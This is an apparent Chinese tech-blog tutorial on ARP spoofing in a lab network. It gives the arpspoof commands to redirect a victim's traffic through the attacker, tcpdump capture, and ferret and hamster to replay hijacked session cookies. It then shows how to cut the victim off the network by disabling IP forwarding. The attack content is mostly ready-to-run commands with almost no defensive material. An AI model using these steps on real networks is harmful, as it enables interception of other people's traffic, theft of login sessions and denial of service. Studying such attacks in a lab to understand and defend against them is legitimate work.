ARP欺骗攻击和会话劫持和断网攻击

本文介绍如何使用arpspoof工具实施ARP欺骗攻击,包括配置IP转发、重定向流量及抓包分析等步骤,并演示了如何利用这些技术进行网络监控。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  ARP欺骗攻击有很多很多的工具可用,可以达到的目的相应的也有很多。我会根据实现攻击相应的更新一些工具的使用。

arpspoof命令格式:

arpspoof -i 网卡 -t 目标 host

欺骗攻击:

   kali : 192.168.46.136

  win7 : 192.168.46.137

  网管 :192.168.46.2

开启ip转发:

echo 1 >> /proc/sys/net/ipv4/ip_forward
可以用cat查看是否成功。

重定向受害者者的流量传给攻击者:

arpspoof -i eth0 -t 192.168.46.137 192.168.46.2

tcpdump抓包(使用wireshark也可以)

因为网关具有路由功能,因此只要监听本地网卡流量就能得到目标主机的流量。

简单用法: tcpdump -w cookie.cap  #抓取所有流量写入cookie.cap


进行一段时间的欺骗,期间可以随便浏览些网页,聊天之类的,比如现在访问数字杭电,一段时间后停止欺骗、停止抓包,并配合使用ferret处理抓取的流量。

简单用法: ferret -r cookie.cap  #处理抓取的流量


确保cookie.cap在root根目录下后,终端输入hamster。

接着给浏览器设置代理。ip为 127.0.0.1 端口为 1234.

设置完就可以通过访问127.0.0.1:1234或者hamster来查看劫持的数据了


ARP断网攻击:

实现起来非常简单,记得关闭本地ip转发:echo 0 >> /proc/sys/net/ipv4/ip_forward

ifconfig–查看网卡信息

fping  -asg 192.168.46.1/24  -查询局域网连接的IP

arpspoof  -i eth0 –t 目标IP     自己的网关  192.168.46.2



评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值